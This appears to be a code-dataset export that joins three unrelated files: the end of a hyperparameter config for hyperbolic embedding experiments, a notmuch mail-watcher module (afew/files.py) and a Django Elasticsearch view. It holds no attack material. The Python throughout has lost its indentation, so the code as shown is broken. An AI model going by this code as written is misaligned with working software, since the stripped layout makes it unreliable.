('resc_vecs', 0.7), ## 0.7 and 0.8 are similar
('epochs', 300),
('K', 0.1),
('margin', 0.01),
############### Init loss:
('init_class', 'PoincareNIPS'), # PoincareNIPS, EuclNIPS
('lr_init', 0.03), # 0.3, 0.03, 0.1 all kind of good; 0.03 the best 94%, but with 1/10 factor for burnin
('epochs_init', 100),
('neg_sampl_strategy_init', 'true_neg'), # 'true_neg' always better!
('epochs_init_burn_in', 20),
('neg_sampling_power_init', 0.75), # 0 for uniform, 1 for unigram, 0.75 much better than 0 !!!!!! Do not put 0.
])
### We run 3 different jobs, but each of them will be ran in all.py:291 for all training settings (percentage of transitive closure).
non_default_params = [
### Our method : hyperbolic entailment cones
# File: task_50percent#dim_5#class_HypCones#init_class_PoincareNIPS#neg_sampl_strategy_true_neg#lr_0.0003#epochs_300#opt_rsgd#where_not_to_sample_children#neg_edges_attach_parent#lr_init_0.03#epochs_init_100#neg_sampl_strategy_init_true_neg
# ======> best OVERALL f1 CONES test = 92.80; CONES valid = 92.60 - after 260 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'HypCones' ;for i in `ls ./logs/task_50percent#epochs*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done
[('dim', 5), ('class', 'HypCones'), ('init_class', 'PoincareNIPS'), ('neg_sampl_strategy', 'true_neg'), ('lr', 0.0003), ('epochs', 300), ('opt', 'rsgd'), ('where_not_to_sample', 'children'), ('neg_edges_attach', 'parent'), ('lr_init', 0.03), ('epochs_init', 100), ('neg_sampl_strategy_init', 'true_neg')],
### Poincare embeddings of Nickel et al., NIPS'18 - we look for the INIT results in this log file.
# File: task_50percent#dim_5#class_HypCones#init_class_PoincareNIPS#neg_sampl_strategy_true_neg_non_leaves#lr_0.0001#epochs_300#opt_exp_map#where_not_to_sample_ancestors#neg_edges_attach_child#lr_init_0.03#epochs_init_100#neg_sampl_strategy_init_true_neg
# ======> best OVERALL f1 INIT test = 83.60; INIT valid = 83.60 - after 80 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep INIT | grep OVERALL ; done | grep -A1 'PoincareNIPS'; for i in `ls ./logs/task_50percent#epochs*` ; do echo $i; cat $i | grep best | grep INIT | grep OVERALL ; done
[('dim', 5), ('class', 'HypCones'), ('init_class', 'PoincareNIPS'), ('neg_sampl_strategy', 'true_neg_non_leaves'), ('lr', 0.0001), ('epochs', 300), ('opt', 'exp_map'), ('where_not_to_sample', 'ancestors'), ('neg_edges_attach', 'child'), ('lr_init', 0.03), ('epochs_init', 100), ('neg_sampl_strategy_init', 'true_neg')],
### Order embeddings of Vendrov et al, ICLR'16
# File: task_50percent#dim_5#class_OrderEmb#neg_sampl_strategy_true_neg#lr_0.1#margin_1#epochs_500#where_not_to_sample_children#neg_edges_attach_parent
# ======> best OVERALL f1 CONES test = 81.70; CONES valid = 81.60 - after 460 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'OrderEmb' ;for i in `ls ./logs/task_50percent#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'OrderEmb'
[('dim', 5), ('class', 'OrderEmb'), ('neg_sampl_strategy', 'true_neg'), ('lr', 0.1), ('margin', 1), ('epochs', 500), ('where_not_to_sample', 'children'), ('neg_edges_attach', 'parent')],
]
### Remove duplicate commands
p = []
for i in range(len(non_default_params)):
has_copy = False
for j in range(i+1, len(non_default_params)):
if non_default_params[i] == non_default_params[j]:
has_copy = True
if not has_copy:
p.append(non_default_params[i])
non_default_params = p |
afew/files.py | naegling/afew | 159 | 12659345 | <reponame>naegling/afew<gh_stars>100-1000
# SPDX-License-Identifier: ISC
# Copyright (c) <NAME> <<EMAIL>>
import os
import re
import stat
import logging
import platform
import queue
import threading
import notmuch
import pyinotify
import ctypes
import contextlib
if platform.system() != 'Linux':
raise ImportError('Unsupported platform: {!r}'.format(platform.system()))
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, options, database):
self.options = options
self.database = database
super().__init__()
ignore_re = re.compile('(/xapian/.*(base.|tmp)$)|(\.lock$)|(/dovecot)')
def process_IN_DELETE(self, event):
if self.ignore_re.search(event.pathname):
return
logging.debug("Detected file removal: {!r}".format(event.pathname))
self.database.remove_message(event.pathname)
self.database.close()
def process_IN_MOVED_TO(self, event):
if self.ignore_re.search(event.pathname):
return
src_pathname = event.src_pathname if hasattr(event, 'src_pathname') else None
logging.debug("Detected file rename: {!r} -> {!r}".format(src_pathname, event.pathname))
def new_mail(message):
for filter_ in self.options.enable_filters:
try:
filter_.run('id:"{}"'.format(message.get_message_id()))
filter_.commit(self.options.dry_run)
except Exception as e:
logging.warn('Error processing mail with filter {!r}: {}'.format(filter_.message, e))
try:
self.database.add_message(event.pathname,
sync_maildir_flags=True,
new_mail_handler=new_mail)
except notmuch.FileError as e:
logging.warn('Error opening mail file: {}'.format(e))
return
except notmuch.FileNotEmailError as e:
logging.warn('File does not look like an email: {}'.format(e))
return
else:
if src_pathname:
self.database.remove_message(src_pathname)
finally:
self.database.close()
def watch_for_new_files(options, database, paths, daemonize=False):
wm = pyinotify.WatchManager()
mask = (
pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM |
pyinotify.IN_MOVED_TO)
handler = EventHandler(options, database)
notifier = pyinotify.Notifier(wm, handler)
logging.debug('Registering inotify watch descriptors')
wdds = dict()
for path in paths:
wdds[path] = wm.add_watch(path, mask)
# TODO: honor daemonize
logging.debug('Running mainloop')
notifier.loop()
try:
libc = ctypes.CDLL(ctypes.util.find_library("c"))
except ImportError as e:
raise ImportError('Could not load libc: {}'.format(e))
class Libc:
class c_dir(ctypes.Structure):
pass
c_dir_p = ctypes.POINTER(c_dir)
opendir = libc.opendir
opendir.argtypes = [ctypes.c_char_p]
opendir.restype = c_dir_p
closedir = libc.closedir
closedir.argtypes = [c_dir_p]
closedir.restype = ctypes.c_int
@classmethod
@contextlib.contextmanager
def open_directory(cls, path):
handle = cls.opendir(path)
yield handle
cls.closedir(handle)
class c_dirent(ctypes.Structure):
'''
man 3 readdir says::
On Linux, the dirent structure is defined as follows:
struct dirent {
ino_t d_ino; /* inode number */
off_t d_off; /* offset to the next dirent */
unsigned short d_reclen; /* length of this record */
unsigned char d_type; /* type of file; not supported
by all file system types */
char d_name[256]; /* filename */
};
'''
_fields_ = (
('d_ino', ctypes.c_long),
('d_off', ctypes.c_long),
('d_reclen', ctypes.c_ushort),
('d_type', ctypes.c_byte),
('d_name', ctypes.c_char * 4096),
)
c_dirent_p = ctypes.POINTER(c_dirent)
readdir = libc.readdir
readdir.argtypes = [c_dir_p]
readdir.restype = c_dirent_p
# magic value for directory
DT_DIR = 4
blacklist = {'.', '..', 'tmp'}
def walk_linux(channel, path):
channel.put(path)
with Libc.open_directory(path) as handle:
while True:
dirent_p = Libc.readdir(handle)
if not dirent_p:
break
if dirent_p.contents.d_type == Libc.DT_DIR and \
dirent_p.contents.d_name not in blacklist:
walk_linux(channel, os.path.join(path, dirent_p.contents.d_name))
def walk(channel, path):
channel.put(path)
for child_path in (os.path.join(path, child)
for child in os.listdir(path)
if child not in blacklist):
try:
stat_result = os.stat(child_path)
except Exception:
continue
if stat_result.st_mode & stat.S_IFDIR:
walk(channel, child_path)
def walker(channel, path):
walk_linux(channel, path)
channel.put(None)
def quick_find_dirs_hack(path):
results = queue.Queue()
walker_thread = threading.Thread(target=walker, args=(results, path))
walker_thread.daemon = True
walker_thread.start()
while True:
result = results.get()
if result is not None:
yield result
else:
break
|
api/app/search/views.py | phuonglvh/DataEngineeringProject | 417 | 12659349 | <gh_stars>100-1000
from django_elasticsearch_dsl_drf.viewsets import DocumentViewSet
from django_elasticsearch_dsl_drf.filter_backends import (
FilteringFilterBackend,
CompoundSearchFilterBackend,
DefaultOrderingFilterBackend,
OrderingFilterBackend
)
from search.documents import NewsDocument
from search.serializers import NewsDocumentSerializer
class NewsDocumentView(DocumentViewSet):
document = NewsDocument
serializer_class = NewsDocumentSerializer
lookup_field = "id"
filter_backends = [
CompoundSearchFilterBackend,
FilteringFilterBackend,
DefaultOrderingFilterBackend,
OrderingFilterBackend
]
search_fields = (
"title",
"description"
)
filter_fields = {
"language": "language"
}
ordering_fields = {
"published": "published",
"author": "author",
"language": "language"
}
ordering = (
"published",
)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.